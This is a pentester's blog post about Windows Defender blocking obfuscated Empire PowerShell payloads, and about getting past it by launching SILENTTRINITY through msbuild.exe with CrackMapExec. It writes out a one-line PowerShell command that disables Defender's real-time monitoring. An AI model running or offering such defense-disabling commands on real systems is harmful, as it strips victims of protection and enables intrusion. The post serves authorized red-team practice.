Suck it, Windows Defender.

When Invoke-Obfuscation came out in late 2016, I, and I’m sure many other pentesters, rejoiced at the fact that our commands bypassed AV like it wasn’t even there. Empire payload? Easy. Privilege escalation Powershell scripts? Not a problem.

In 2016, Windows Defender was but an annoying feature in Windows that would just catch Cain & Abel. Fast forward two years and now it’s one of the best, if not the best AV on the market. When I created ADAPE, AV didn’t do anything about it. Kaspersky, McAfee, AMP, Windows Defender, etc. were all bypassed because everything was encoded using Invoke-Obfuscation. Within two months of publishing that script, Defender now hates it. I tried encoding the commands and scripts in different ways, but it still caught it. I didn’t have a clue on how to bypass this damn basic AV solution that was built into every modern PC.

Recently, on an engagement, I had Empire set up, and used CrackMapExec to execute the Powershell payload on a target. Of course, it was blocked by Defender. No worries, CME supports Invoke-Obfuscation now and even has it built in with the –obfs switch. Surely it would work now, right?

Wrong. Defender even caught that. Game on. By default, Empire spits out a base64 encoded payload that looks like this when decoded.

ps1

So I would historically encode it via Invoke-Obfuscation.

obfs1

And it would work. Until recently.

obfs2.PNG

Ok, fair enough. I only encoded it once and reversed it, let’s try encoding it a bit better.

obfs3.PNG

obfs4

Really?

Ok, let’s try special characters.

spc1

spc2.PNG

safsa.PNG

2.PNG

So, it’s clear Defender has caught on and now there needs to be a new method to the madness. Luckily, I found something out: Why bypass AV when you can just turn it off? Yeah, they might have alerts set to ring when Defender is turned off, but at this point the engagement is dead if I can’t get by, so I’m willing to take that chance.

Turning off Defender is pretty easy. It’s actually one line of PS.

Set-MpPreference -DisableRealtimeMonitoring $true

However, the catch is you need to have administrative privileges.

block.PNG


Last year, byt3bl33d3r published a new, awesome, tool called SILENTTRINITY. I wrote an article on how to use it here, but the TL;DR version is that it’s a C2 tool that utilizes IronPython and C# to execute it’s modules and beacon. By default, when installing the .NET framework, it installs a tool called msbuild.exe. This executable builds C# code from an XML file, so if that XML file is really just a hook for the C2 server, it’s going to build it and you have a session on the target.

So, I started using this more than Empire because you don’t have to run anything ‘malicious’ on the target since you can build the XML file via SMB path.

cme

Once I have a session open, I then use the ipy/shell module to run the command to disable Defender

st.PNG

av.PNG

And now I can run ADAPE without being blocked. This really is a testament to how good Windows Defender is now and how far it has come. As adversary simulators, we hate this, but really we know this is awesome.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s